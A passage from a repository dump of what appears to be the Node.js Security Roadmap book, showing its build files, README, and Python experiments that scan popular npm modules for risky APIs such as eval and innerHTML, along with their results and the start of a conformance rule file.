├── .bookignore
├── .gitignore
├── .well-known
    └── security.txt
├── CONTRIBUTING.md
├── CONTRIBUTORS.md
├── LICENSE
├── Makefile
├── README.md
├── SUMMARY.md
├── app.yaml
├── appendix
    ├── .gitignore
    ├── bad-pattern-grep
    │   └── experiment.py
    ├── dyn-load
    │   └── experiment.py
    ├── experiments.md
    ├── jsconf
    │   ├── conformance_proto.textproto
    │   └── experiment.py
    ├── lazy-load
    │   └── experiment.py
    ├── py_common
    │   ├── __init__.py
    │   └── npm.py
    ├── test-code
    │   └── experiment.py
    ├── top100.txt
    └── uses-scripts
    │   └── experiment.py
├── book.json.withcomments
├── chapter-1
    ├── recap.md
    ├── threat-0DY.md
    ├── threat-BOF.md
    ├── threat-CRY.md
    ├── threat-DEX.md
    ├── threat-DOS.md
    ├── threat-EXF.md
    ├── threat-LQC.md
    ├── threat-MTP.md
    ├── threat-QUI.md
    ├── threat-RCE.md
    ├── threat-SHP.md
    ├── threat-UIR.md
    └── threats.md
├── chapter-2
    ├── bounded-eval.md
    ├── bundling.md
    ├── dynamism.md
    ├── example
    │   ├── .gitignore
    │   ├── graphs
    │   │   ├── filtered.dot
    │   │   ├── filtered.svg
    │   │   ├── full.dot
    │   │   └── full.svg
    │   ├── index.js
    │   ├── lib
    │   │   ├── dynamic.js
    │   │   ├── lazy.js
    │   │   ├── opt2.js
    │   │   └── static.js
    │   ├── make_dep_graph.sh
    │   ├── package.json
    │   └── test
    │   │   └── test.js
    ├── experiments
    │   └── webpack-compat
    │   │   ├── .gitignore
    │   │   ├── goodbye.js
    │   │   ├── hello.js
    │   │   ├── index.js
    │   │   ├── package.json
    │   │   ├── test-utils.js
    │   │   ├── test.sh
    │   │   ├── test
    │   │       └── test.js
    │   │   └── webpack.config.js
    ├── source-contents.md
    ├── synthetic-modules.md
    └── what-about-eval.md
├── chapter-3
    └── knowing_dependencies.md
├── chapter-4
    └── close_dependencies.md
├── chapter-5
    └── oversight.md
├── chapter-6
    └── failing.md
├── chapter-7
    ├── child-processes.md
    ├── examples
    │   ├── sh
    │   │   ├── index.js
    │   │   ├── package.json
    │   │   └── test
    │   │   │   └── test.js
    │   └── sql
    │   │   ├── index.js
    │   │   ├── package.json
    │   │   └── test
    │   │       └── test.js
    ├── libraries.md
    ├── query-langs.md
    └── structured-strings.md
├── cover.md
├── images
    ├── FileExternal.svg
    ├── GitHub-Mark-32px.png
    ├── ic_print_24dp.svg
    └── npmjs-node.png
├── license.md
├── package-lock.json
├── package.json
├── styles
    └── website.css
└── third_party
    ├── __init__.py
    └── jslex
        ├── __init__.py
        └── jslex.py


/.bookignore:
--------------------------------------------------------------------------------
 1 | app.yaml
 2 | Makefile
 3 | book.json.withcomments
 4 | appendix/**/*.py
 5 | appendix/**/*.textproto
 6 | chapter-2/example/**/*.js
 7 | chapter-2/experiments/**/*.js
 8 | chapter-7/examples/**/*.js
 9 | CONTRIBUTING.md
10 | **/*.sh
11 | third_party
12 | package.json
13 | package-lock.json
14 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | # See appendix/README.md for how to run experiments.
 2 | appendix/jsconf/externs
 3 | appendix/tools
 4 | # Generated by `npm install`
 5 | node_modules
 6 | npm-debug.log
 7 | chapter-2/example/package-lock.json
 8 | # Generated by Makefile
 9 | www
10 | deploy
11 | .*.tstamp
12 | #book.json  # Should be ignored but breaks gitbook
13 | # Generated by `gitbook serve
14 | _book
15 | # Emacs droppings
16 | .\#*
17 | *~
18 | # Python droppings
19 | *.pyc
20 | 


--------------------------------------------------------------------------------
/.well-known/security.txt:
--------------------------------------------------------------------------------
1 | Contact: mikesamuel@gmail.com
2 | Acknowledgement: https://github.com/google/node-sec-roadmap/tree/master/CONTRIBUTORS.md
3 | 


--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
 1 | # How to Contribute
 2 | 
 3 | We'd love to accept your patches and contributions to this project. There are
 4 | just a few small guidelines you need to follow.
 5 | 
 6 | ## Contributor License Agreement
 7 | 
 8 | Contributions to this project must be accompanied by a Contributor License
 9 | Agreement. You (or your employer) retain the copyright to your contribution;
10 | this simply gives us permission to use and redistribute your contributions as
11 | part of the project. Head over to <https://cla.developers.google.com/> to see
12 | your current agreements on file or to sign a new one.
13 | 
14 | You generally only need to submit a CLA once, so if you've already
15 | submitted one (even if it was for a different project), you probably
16 | don't need to do it again.
17 | 
18 | ## Code reviews
19 | 
20 | All submissions, including submissions by project members, require review. We
21 | use GitHub pull requests for this purpose. Consult
22 | [GitHub Help](https://help.github.com/articles/about-pull-requests/) for more
23 | information on using pull requests.
24 | 


--------------------------------------------------------------------------------
/CONTRIBUTORS.md:
--------------------------------------------------------------------------------
 1 | * [Ali Ijaz Sheikh](https://github.com/ofrobots)
 2 | * [Franziska Hinkelmann](https://github.com/fhinkel/)
 3 | * [Jen Tong](https://github.com/mimming)
 4 | * [John J. Barton](https://github.com/johnjbarton)
 5 | * [Justin Beckwith](https://github.com/JustinBeckwith)
 6 | * [Mark S. Miller](https://github.com/erights)
 7 | * [Mike Samuel](https://github.com/mikesamuel)
 8 | * [Myles Borins](https://github.com/mylesborins)
 9 | 
10 | Special thanks for feedback and criticism:
11 | 
12 | * [Matteo Collina](https://github.com/mcollina)
13 | * [Rich Trott](https://github.com/Trott)
14 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | Markdown and gitbook content is (C) Google LLC and is
 2 | made available under
 3 | https://creativecommons.org/licenses/by/4.0/
 4 | 
 5 | 
 6 | Code is avilable under the Apache 2.0 License
 7 | ---------------------------------------------
 8 | Copyright 2017 Google LLC
 9 | 
10 | Licensed under the Apache License, Version 2.0 (the "License");
11 | you may not use this file except in compliance with the License.
12 | You may obtain a copy of the License at
13 | 
14 |     https://www.apache.org/licenses/LICENSE-2.0
15 | 
16 | Unless required by applicable law or agreed to in writing, software
17 | distributed under the License is distributed on an "AS IS" BASIS,
18 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
19 | See the License for the specific language governing permissions and
20 | limitations under the License.


--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
  1 | # This Makefile builds various versions of the Gitbook, runs
  2 | # sanity checks, and sets up a deployment directory.
  3 | #
  4 | # See `make help`
  5 | 
  6 | define HELP
  7 | Targets
  8 | =======
  9 | `make book`         puts HTML files under www/
 10 | `make pdf`          builds the PDF version
 11 | `make serve_static` serve the book from http://localhost:4000/
 12 | `make serve`        launch the builtin gitbook debug server
 13 | `make check`        runs sanity checks
 14 | `make deploy`       builds the deployment directory and runs checks
 15 | 
 16 | Setup
 17 | =====
 18 | This assumes that PATH includes
 19 |    https://github.com/gjtorikian/html-proofer
 20 |    https://calibre-ebook.com/download
 21 | that the following environment variables point to reasonable values:
 22 |    HTML_PROOFER   # path to htmlproofer executable
 23 |    CALIBRE_HOME   # path to directory containing calibre executables
 24 | 
 25 | Deploying
 26 | =========
 27 | `make deploy` builds the deploy directory.
 28 | From that directory `gcloud app deploy --project node-sec-roadmap`
 29 | deploys to the canonical location if you have the right
 30 | privileges and have run `gcloud auth login`.
 31 | endef
 32 | export HELP
 33 | 
 34 | 
 35 | ROOT_DIR:=$(shell dirname $(realpath $(lastword $(MAKEFILE_LIST))))
 36 | 
 37 | # External dependency used to detect dead links
 38 | ifeq ($(HTML_PROOFER),)
 39 |   HTML_PROOFER:=${HOME}/.gem/ruby/2.4.0/gems/html-proofer-3.8.0/bin/htmlproofer
 40 |   ifeq (,$(wildcard ${HTML_PROOFER}))
 41 | 	HTML_PROOFER:=/bin/echo
 42 |   endif
 43 | endif
 44 | 
 45 | # External dependency used to build pdf
 46 | ifeq ($(CALIBRE_HOME),)
 47 |   CALIBRE_HOME:=/Applications/calibre.app/Contents/console.app/Contents/MacOS/
 48 | endif
 49 | 
 50 | 
 51 | # Bits that gitbook depends on
 52 | GITBOOK_DEPS := node_modules book.json cover.md SUMMARY.md CONTRIBUTORS.md \
 53 | 		$(wildcard chapter-*/*.md) appendix/experiments.md \
 54 | 		styles/website.css images/*
 55 | 
 56 | 
 57 | help:
 58 | 	@echo "$$HELP"
 59 | 
 60 | book.json : book.json.withcomments
 61 | 	@cat book.json.withcomments \
 62 | 	| perl -ne 'print unless m/^[ \t]*#/' > book.json
 63 | 
 64 | pdf : www/node-sec-roadmap.pdf
 65 | www/node-sec-roadmap.pdf : $(GITBOOK_DEPS)
 66 | 	PATH="${PATH}:./node_modules/.bin/:${CALIBRE_HOME}" \
 67 | 	    ./node_modules/.bin/gitbook pdf . www/node-sec-roadmap.pdf
 68 | 
 69 | book : www/.book.tstamp
 70 | www/.book.tstamp : $(GITBOOK_DEPS)
 71 | 	"${ROOT_DIR}"/node_modules/.bin/gitbook build . www
 72 | 	@touch www/.book.tstamp
 73 | 
 74 | check : .check.tstamp
 75 | .check.tstamp : deploy/.deploy.tstamp
 76 | 	touch .check.tstamp
 77 | 	echo Checking that we correctly capitalize npm and Nodejs
 78 | 	echo and that all Markdown link names are defined.
 79 | 	@! find deploy/www/ -name \*.html \
 80 | 	    | xargs egrep '\]\[|[nN][oO][dD][eE]J[sS]|\bN[Pp][Mm]\b' \
 81 | 	    | egrep -v 'x\[a\]\[b\]|this\[x\]\[|[.]jfrog[.]com/'
 82 | 	echo Checking for dead links
 83 | 	@if [ "${HTML_PROOFER}" = "/bin/echo" ]; then \
 84 | 		echo "Warning: HTML_PROOFER not available"; \
 85 | 	else \
 86 | 		echo Running htmlproofer; \
 87 | 		"${HTML_PROOFER}" \
 88 | 		  --alt-ignore=example/graphs/full.svg \
 89 | 		  "${ROOT_DIR}"/deploy/www/; \
 90 | 	fi
 91 | 	@find deploy -name node_modules \
 92 | 	    || (echo "deploy/ should not include node_modules"; false)
 93 | 
 94 | serve : $(GITBOOK_DEPS)
 95 | 	"${ROOT_DIR}"/node_modules/.bin/gitbook serve
 96 | 
 97 | serve_static : book
 98 | 	pushd www; python -m SimpleHTTPServer 4000; popd
 99 | 
100 | clean :
101 | 	rm -rf www/ deploy/ _book/ book.json .*.tstamp
102 | 
103 | node_modules : package.json
104 | 	npm install --only=prod
105 | 	@touch node_modules/
106 | 
107 | deploy : deploy/.deploy.tstamp check
108 | deploy/.deploy.tstamp : book pdf app.yaml
109 | 	rm -rf deploy/
110 | 	mkdir deploy/
111 | 	cp app.yaml deploy/
112 | 	cp -r www/ deploy/www/
113 | 	@touch deploy/.deploy.tstamp
114 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Node.js Security Roadmap
 2 | 
 3 | The security roadmap is a [gitbook](https://toolchain.gitbook.com/)
 4 | publication available at
 5 | *[nodesecroadmap.fyi](https://nodesecroadmap.fyi)*.
 6 | 
 7 | ```sh
 8 | $ npm start
 9 | ```
10 | 
11 | will serve the book via `localhost:4000`.
12 | 
13 | ```sh
14 | $ make help
15 | ```
16 | 
17 | will display help information about other options.
18 | 
19 | Please file errata at the
20 | [issue tracker](https://github.com/google/node-sec-roadmap/issues)
21 | or send us a pull request.
22 | 
23 | If you'd like to help out, please also see our
24 | [contribution guidelines](CONTRIBUTING.md).
25 | 


--------------------------------------------------------------------------------
/SUMMARY.md:
--------------------------------------------------------------------------------
 1 | # Summary
 2 | 
 3 | *  [Threat Environment](chapter-1/threats.md)
 4 |   *  [Zero Day](chapter-1/threat-0DY.md)
 5 |   *  [Buffer Overflow](chapter-1/threat-BOF.md)
 6 |   *  [Weak Crypto](chapter-1/threat-CRY.md)
 7 |   *  [Poor Developer Experience](chapter-1/threat-DEX.md)
 8 |   *  [Denial of Service](chapter-1/threat-DOS.md)
 9 |   *  [Exfiltration of Data](chapter-1/threat-EXF.md)
10 |   *  [Low Quality Code](chapter-1/threat-LQC.md)
11 |   *  [Malicious Third-Party Code](chapter-1/threat-MTP.md)
12 |   *  [Query Injection](chapter-1/threat-QUI.md)
13 |   *  [Remote Code Execution](chapter-1/threat-RCE.md)
14 |   *  [Shell Injection during Production](chapter-1/threat-SHP.md)
15 |   *  [Unintended Require](chapter-1/threat-UIR.md)
16 |   *  [Recap](chapter-1/recap.md)
17 | *  [Dynamism when you need it](chapter-2/dynamism.md)
18 |   *  [Dynamic Bundling](chapter-2/bundling.md)
19 |   *  [Production Source Lists](chapter-2/source-contents.md)
20 |   *  [What about eval?](chapter-2/what-about-eval.md)
21 |   *  [Synthetic Modules](chapter-2/synthetic-modules.md)
22 |   *  [Bounded Eval](chapter-2/bounded-eval.md)
23 | *  [Knowing your dependencies](chapter-3/knowing_dependencies.md)
24 | *  [Keeping your dependencies close](chapter-4/close_dependencies.md)
25 | *  [Oversight](chapter-5/oversight.md)
26 | *  [When all else fails](chapter-6/failing.md)
27 | *  [Library support for safe coding practices](chapter-7/libraries.md)
28 |   *  [Query languages](chapter-7/query-langs.md)
29 |   *  [Child processes](chapter-7/child-processes.md)
30 |   *  [Structured strings](chapter-7/structured-strings.md)
31 | 
32 | ----
33 | 
34 | *  [Appendix: Experiments](appendix/experiments.md)
35 | *  [Contributors](CONTRIBUTORS.md)
36 | *  [License](license.md)
37 | *  [Errata](https://github.com/google/node-sec-roadmap/issues)
38 | 


--------------------------------------------------------------------------------
/app.yaml:
--------------------------------------------------------------------------------
 1 | # cloud.google.com/appengine/docs/standard/python/config/appref
 2 | runtime: python27
 3 | api_version: 1
 4 | threadsafe: true
 5 | 
 6 | handlers:
 7 | - url: /
 8 |   static_files: www/index.html
 9 |   upload: www/index.html
10 |   secure: always
11 |   mime_type: text/html; charset=UTF-8
12 |   expiration: 30m
13 | 
14 | - url: /(.*[.]html)$
15 |   static_files: www/\1
16 |   upload: www/(.*[.]html)$
17 |   secure: always
18 |   mime_type: text/html; charset=UTF-8
19 |   expiration: 30m
20 | 
21 | - url: /(.*[.]css)$
22 |   static_files: www/\1
23 |   upload: www/(.*[.]css)$
24 |   secure: always
25 |   mime_type: text/css; charset=UTF-8
26 |   expiration: 30m
27 | 
28 | - url: /(.*[.]js)$
29 |   static_files: www/\1
30 |   upload: www/(.*[.]js)$
31 |   secure: always
32 |   mime_type: text/javascript; charset=UTF-8
33 |   expiration: 30m
34 | 
35 | - url: /(.*[.]json)$
36 |   static_files: www/\1
37 |   upload: www/(.*[.]json)$
38 |   secure: always
39 |   mime_type: application/json; charset=UTF-8
40 |   expiration: 30m
41 | 
42 | - url: /(.*[.]txt)$
43 |   static_files: www/\1
44 |   upload: www/(.*[.]txt)$
45 |   secure: always
46 |   mime_type: text/plain; charset=UTF-8
47 |   expiration: 30m
48 | 
49 | - url: /(.*[.]svg)$
50 |   static_files: www/\1
51 |   upload: www/(.*[.]svg)$
52 |   secure: always
53 |   mime_type: image/svg+xml; charset=UTF-8
54 |   expiration: 30m
55 | 
56 | - url: /(.*[.](ico|dot|eot|otf|png|ttf|woff|woff2|pdf))$
57 |   static_files: www/\1
58 |   upload: www/(.*[.](ico|dot|eot|otf|png|ttf|woff|woff2|pdf))$
59 |   secure: always
60 |   expiration: 30m
61 | 
62 | skip_files:
63 | - ^(.*/)?#.*#$
64 | - ^(.*/)?.*~$
65 | - ^(.*/)?.*\.py[co]$
66 | - ^(.*/)?.*/RCS/.*$
67 | - ^(.*/)?\.(?!well-known(?:/|$)).*$
68 | 


--------------------------------------------------------------------------------
/appendix/.gitignore:
--------------------------------------------------------------------------------
1 | node_modules/**
2 | separate-modules/**
3 | **~
4 | **.pyc
5 | 


--------------------------------------------------------------------------------
/appendix/bad-pattern-grep/experiment.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | 
  3 | # Copyright 2017 Google LLC
  4 | #
  5 | # Licensed under the Apache License, Version 2.0 (the "License");
  6 | # you may not use this file except in compliance with the License.
  7 | # You may obtain a copy of the License at
  8 | #
  9 | #     https://www.apache.org/licenses/LICENSE-2.0
 10 | #
 11 | # Unless required by applicable law or agreed to in writing, software
 12 | # distributed under the License is distributed on an "AS IS" BASIS,
 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 14 | # See the License for the specific language governing permissions and
 15 | # limitations under the License.
 16 | 
 17 | """
 18 | Look for problematic patterns like calls to eval and assignments
 19 | to innerHTML that often lead to XSS when not consistently guarded.
 20 | """
 21 | 
 22 | import py_common.npm
 23 | import re
 24 | import sys
 25 | 
 26 | _LEFT_BOUNDARY = r'(?<![.$_\w])'
 27 | _RIGHT_BOUNDARY = r'(?![.$_\w])'
 28 | 
 29 | _PATTERNS = (
 30 |     ('eval',
 31 |      re.compile(_LEFT_BOUNDARY + r'eval' + _RIGHT_BOUNDARY)),
 32 |     ('Function constructor',
 33 |      re.compile(_LEFT_BOUNDARY + 'new\s*Function' + _RIGHT_BOUNDARY)),
 34 |     ('innerHTML assignment',
 35 |      re.compile('[.]\s*(inner|outer)HTML\s*=')),
 36 |     ('URL property assignment',
 37 |      re.compile('[.]\s*(src|href)\s*=')),
 38 | )
 39 | 
 40 | def find_violations(node_modules, module_name):
 41 |     violations = []
 42 |     js_srcs = py_common.npm.js_srcs_almost_worst_case(node_modules, module_name)
 43 |     for (_, js_path) in js_srcs:
 44 |         content = py_common.npm.preprocess_js_content(file(js_path, 'r').read())
 45 |         for (rule_name, pattern) in _PATTERNS:
 46 |             for _ in pattern.finditer(content):
 47 |                 violations.append(rule_name)
 48 |     return violations
 49 | 
 50 | 
 51 | if __name__ == '__main__':
 52 |     (node_modules, separate_modules, top100_txt) = sys.argv[1:]
 53 | 
 54 |     top100 = [x for x in file(top100_txt).read().split('\n') if x]
 55 | 
 56 |     # Maps rule identifiers to sets of offending modules.
 57 |     rule_violations = {}
 58 | 
 59 |     module_count = 0
 60 |     for module_name in top100:
 61 |         violations = find_violations(node_modules, module_name)
 62 |         if 'Parse error' in violations or 'Argument list too long' in violations:
 63 |             pass
 64 |         else:
 65 |             module_count += 1
 66 |         for v in violations:
 67 |             if v in rule_violations:
 68 |                 vmap = rule_violations[v]
 69 |             else:
 70 |                 vmap = rule_violations[v] = {}
 71 |             vmap[module_name] = vmap.get(module_name, 0) + 1
 72 | 
 73 |     # TODO: exclude Parse error and Argument list too long
 74 | 
 75 |     print "## Grepping for Problems {#grep-problems}"
 76 |     print ""
 77 |     print "JS Conformance uses sophisticated type reasoning to find"
 78 |     print "problems in JavaScript code"
 79 |     print "(see [JS Conformance experiment](#jsconf))."
 80 |     print "It may not find problems in code that lacks type hints"
 81 |     print "or that does not parse."
 82 |     print ""
 83 |     print "Grep can be used to reliably find some subset of problems that"
 84 |     print "JS Conformance can identify."
 85 |     print ""
 86 |     print "If grep finds more of the kinds of problems that it can find"
 87 |     print "than JS Conformance, then the code cannot be effectively vetted"
 88 |     print "by code quality tools like JS Conformance."
 89 |     print ""
 90 |     print "| Violation | Count of Modules | Total Count | Quartiles |"
 91 |     print "| --------- | ---------------- | ----------- | --------- |"
 92 |     for (v, vmap) in sorted(rule_violations.items()):
 93 |         count = 0
 94 |         total_count = 0
 95 |         values = vmap.values()
 96 |         for n in values:
 97 |             count += 1
 98 |             total_count += n
 99 |         values += [0] * (module_count - count)
100 |         values.sort()
101 |         quartiles = '%d / %d / %d' % (
102 |             values[len(values) >> 2],
103 |             values[len(values) >> 1],
104 |             values[(len(values) * 3) >> 2],
105 |         )
106 |         print "| `%s` | %d | %d | %s |" % (
107 |             v, count, total_count, quartiles)
108 | 


--------------------------------------------------------------------------------
/appendix/dyn-load/experiment.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | # Copyright 2017 Google LLC
 4 | #
 5 | # Licensed under the Apache License, Version 2.0 (the "License");
 6 | # you may not use this file except in compliance with the License.
 7 | # You may obtain a copy of the License at
 8 | #
 9 | #     https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 | 
17 | """Looks for dynamic code loading patterns.
18 | 
19 | Patterns to identify include
20 | 
21 |   * require(...) where ... is not a string literal.
22 |   * eval
23 |   * Function(...) where there is more than one argument or the sole
24 |     argument is not a function.
25 | 
26 | """
27 | 
28 | import json
29 | import os.path
30 | import py_common.npm
31 | import re
32 | import shutil
33 | import sys
34 | 
35 | 
36 | dynamic_load_pattern = re.compile(
37 |     r'(?<![_$\w.])require\s*\(\s*[^\s)\"\']'
38 | #    r'(?<![_$\w.])require\s*(?:\(\s*[^\s)\"\']|[^\(])'  # To also match indirect uses of require, like aliasing it to a variable.
39 |     )
40 | 
41 | def find_dynamic_load(node_modules, module_name):
42 |     return py_common.npm.js_srcs_matching(
43 |         node_modules, module_name, dynamic_load_pattern,
44 |         module_filter=py_common.npm.ignore_tools_that_can_run_early(module_name))
45 | 
46 | 
47 | if __name__ == '__main__':
48 |     (node_modules, separate_modules, top100_txt) = sys.argv[1:]
49 | 
50 |     top100 = [x for x in file(top100_txt).read().split('\n') if x]
51 | 
52 |     uses = 0
53 |     total_count = 0
54 |     has_dynamic_load = {}
55 |     for module_name in top100:
56 |         js_srcs = find_dynamic_load(node_modules, module_name)
57 |         has_dynamic_load[module_name] = js_srcs
58 |         if len(js_srcs):
59 |             uses += 1
60 |         total_count += 1
61 | 
62 | #    for k, v in has_dynamic_load.iteritems():
63 | #        print "%s: %r" % (k, v)
64 | 
65 |     print (
66 | """
67 | ## Dynamic loads {#dynamic_load}
68 | 
69 | Dynamic loading can complicate code bundling.
70 | 
71 | %d of %d = %1.02f%% call `require(...)` without a literal string argument.
72 | """ % (uses, total_count, (100.0 * uses) / total_count))
73 | 


--------------------------------------------------------------------------------
/appendix/experiments.md:
--------------------------------------------------------------------------------
  1 | # npm Experiments
  2 | 
  3 | Below are summaries of experiments to check how compatible common npm
  4 | modules are with preprocessing, static checks, and other measures
  5 | to manage cross-cutting security concerns.
  6 | 
  7 | 
  8 | <!-- Begin generated summary -->
  9 | 
 10 | ## Grepping for Problems {#grep-problems}
 11 | 
 12 | JS Conformance uses sophisticated type reasoning to find
 13 | problems in JavaScript code
 14 | (see [JS Conformance experiment](#jsconf)).
 15 | It may not find problems in code that lacks type hints
 16 | or that does not parse.
 17 | 
 18 | Grep can be used to reliably find some subset of problems that
 19 | JS Conformance can identify.
 20 | 
 21 | If grep finds more of the kinds of problems that it can find
 22 | than JS Conformance, then the code cannot be effectively vetted
 23 | by code quality tools like JS Conformance.
 24 | 
 25 | | Violation | Count of Modules | Total Count | Quartiles |
 26 | | --------- | ---------------- | ----------- | --------- |
 27 | | `Function constructor` | 32 | 200 | 0 / 0 / 1 |
 28 | | `URL property assignment` | 35 | 471 | 0 / 0 / 3 |
 29 | | `eval` | 24 | 87 | 0 / 0 / 0 |
 30 | | `innerHTML assignment` | 17 | 81 | 0 / 0 / 0 |
 31 | 
 32 | ## Dynamic loads {#dynamic_load}
 33 | 
 34 | Dynamic loading can complicate code bundling.
 35 | 
 36 | 33 of 108 = 30.56% call `require(...)` without a literal string argument.
 37 | 
 38 | ## JS Conformance {#jsconf}
 39 | 
 40 | JS Conformance identifies uses of risky APIs.
 41 | 
 42 | Some modules did not parse.  This may be dues to typescript.
 43 | JSCompiler doesn't deal well with mixed JavaScript and TypeScript
 44 | inputs.
 45 | 
 46 | If a module is both in the top 100 and is a dependency of another
 47 | module in the top 100, then it will be multiply counted.
 48 | 
 49 | Out of 69 modules that parsed
 50 | 
 51 | | Violation | Count of Modules | Total Count | Quartiles |
 52 | | --------- | ---------------- | ----------- | --------- |
 53 | | `"arguments.callee" cannot be used in strict mode` | 2 | 3 | 0 / 0 / 0 |
 54 | | `Argument list too long` | 8 | 8 | 0 / 0 / 0 |
 55 | | `Illegal redeclared variable: ` | 2 | 9 | 0 / 0 / 0 |
 56 | | `Parse error.` | 31 | 232 | 0 / 0 / 2 |
 57 | | `This style of octal literal is not supported in strict mode.` | 4 | 11 | 0 / 0 / 0 |
 58 | | `Violation: Assigning a value to a dangerous property via setAttribute is forbidden` | 1 | 4 | 0 / 0 / 0 |
 59 | | `Violation: Function, setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...` | 9 | 91 | 0 / 0 / 0 |
 60 | | `Violation: eval is not allowed` | 1 | 3 | 0 / 0 / 0 |
 61 | | `required "..." namespace not provided yet` | 7 | 30 | 0 / 0 / 0 |
 62 | | `type syntax is only supported in ES6 typed mode: ` | 3 | 132 | 0 / 0 / 0 |
 63 | 
 64 | ## Lazy loads {#lazy_load}
 65 | 
 66 | Lazy loading can complicate code bundling if care is not taken.
 67 | 
 68 | 71 of 108 = 65.74% contain a use of require inside a `{...}` block.
 69 | 
 70 | 
 71 | ## Prod bundle includes test code {#test_code}
 72 | 
 73 | Some of the top 100 modules are test code, e.g. mocha, chai.
 74 | This measures which modules, when installed `--only=prod` include
 75 | test patterns.
 76 | 
 77 | 50 of 108 = 46.30% contain test code patterns
 78 | 
 79 | 
 80 | ## Uses Scripts {#uses_scripts}
 81 | 
 82 | Unless steps are taken, installation scripts run code on
 83 | a developer's workstation when they have write access to
 84 | local repositories.  If this number is small, having
 85 | humans check installation scripts before running might
 86 | be feasible.
 87 | 
 88 | 4 of 979 = 0.41% use installation scripts
 89 | 
 90 | 
 91 | <!-- End generated summary -->
 92 | 
 93 | 
 94 | 
 95 | ## Methodology
 96 | 
 97 | The code is [available on Github][code].
 98 | 
 99 | ```bash
100 | $ npm --version
101 | 3.10.10
102 | ```
103 | 
104 | ### Top 100 Module list
105 | 
106 | I extracted `top100.txt` by browsing to the most depended-upon
107 | [package list][top100] and running the below in the dev console until
108 | I had >= 100 entries.
109 | 
110 | ```js
111 | var links = document.querySelectorAll('a.name')
112 | var top100 = Object.create(null)
113 | for (var i = 0; i < links.length; ++i) {
114 |   var link = links[i];
115 |   var packageName = link.getAttribute('href').replace(/^.*\/package\//, '')
116 |   top100[packageName] = true;
117 | }
118 | var top100Names = Object.keys(top100)
119 | top100Names.sort();
120 | top100Names
121 | ```
122 | 
123 | ----
124 | 
125 | We also require some tools so that we can run JSCompiler against
126 | node modules.  From the root directory:
127 | 
128 | ```sh
129 | mkdir tools
130 | curl https://dl.google.com/closure-compiler/compiler-latest.zip \
131 |      > /tmp/closure-latest.zip
132 | pushd tools
133 |   jar xf /tmp/closure-latest.zip
134 | popd
135 | pushd jsconf
136 |   mkdir externs
137 |   pushd externs
138 |     git clone https://github.com/dcodeIO/node.js-closure-compiler-externs.git
139 |   popd
140 | popd
141 | ```
142 | 
143 | 
144 | ### Experiments
145 | 
146 | Each experiment corresponds to a directory with an executable
147 | `experiment.py` file which takes a `node_modules` directory and the top 100
148 | module list and which outputs a snippet of markup.
149 | 
150 | Running
151 | 
152 | ```bash
153 | cat top100.txt | xargs npm install --ignore-scripts --only=prod
154 | mkdir separate-modules
155 | cd separate-modules
156 | for pn in $(cat ../top100.txt ); do
157 |   mkdir -p "$pn"
158 |   pushd "$pn"
159 |   npm install -g --prefix="node_modules/$pn" --ignore-scripts --only=prod "$pn"
160 |   popd
161 | done
162 | ```
163 | 
164 | pulls down the list of node modules.  As of this writing, there are 980
165 | modules that are in the top100 list or are direct or indirect prod
166 | dependencies thereof.
167 | 
168 | To run the experiments and place the outputs under `/tmp/mds/`, run
169 | 
170 | ```bash
171 | mkdir -p /tmp/mds/
172 | export PYTHONPATH="$PWD:$PWD/../third_party:$PYTHONPATH"
173 | for f in *; do
174 |   if [ -f "$f"/experiment.py ]; then
175 |     "$f"/experiment.py node_modules separate-modules top100.txt \
176 |     > "/tmp/mds/$f.md"
177 |   fi
178 | done
179 | ```
180 | 
181 | Concatenating those markdown snippets produces the summary above.
182 | 
183 | ```bash
184 | (for f in $(echo /tmp/mds/*.md | sort); do
185 |    cat "$f";
186 |  done) \
187 | > /tmp/mds/summary
188 | ```
189 | 
190 | [code]: https://github.com/google/node-sec-roadmap/tree/master/appendix
191 | [top100]: https://www.npmjs.com/browse/depended
192 | 


--------------------------------------------------------------------------------
/appendix/jsconf/conformance_proto.textproto:
--------------------------------------------------------------------------------
  1 | # Copyright 2014 The Closure Compiler Authors.
  2 | #
  3 | # Licensed under the Apache License, Version 2.0 (the "License");
  4 | # you may not use this file except in compliance with the License.
  5 | # You may obtain a copy of the License at
  6 | #
  7 | #     http://www.apache.org/licenses/LICENSE-2.0
  8 | #
  9 | # Unless required by applicable law or agreed to in writing, software
 10 | # distributed under the License is distributed on an "AS IS" BASIS,
 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 12 | # See the License for the specific language governing permissions and
 13 | # limitations under the License.
 14 | 
 15 | # This file contains example JS conformance configurations for various problems
 16 | # with JavaScript. Since each project may want to opt-in to different rules, and
 17 | # each project may need its own specific whitelist, the examples in this file
 18 | # are meant to be copied to a project specific conformance_proto.textproto file.
 19 | 
 20 | requirement: {
 21 |   type: BANNED_NAME
 22 |   error_message: 'eval is not allowed'
 23 | 
 24 |   value: 'eval'
 25 | 
 26 |   whitelist: 'javascript/closure/base.js'
 27 |   whitelist: 'javascript/closure/json/json.js'
 28 | }
 29 | 
 30 | requirement: {
 31 |   rule_id: 'closure:stringFunctionDefinition'
 32 |   type: RESTRICTED_NAME_CALL
 33 | 
 34 |   value: 'Function:function()'
 35 |   value: 'setTimeout:function(string, ...?)'
 36 |   value: 'setImmediate:function(string, ...?)'
 37 |   value: 'setInterval:function(string, ...?)'
 38 |   value: 'requestAnimationFrame:function(string, ...?)'
 39 | 
 40 |   error_message: 'Function, setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...'
 41 | }
 42 | 
 43 | requirement: {
 44 |   rule_id: 'closure:windowStringFunctionDefinition'
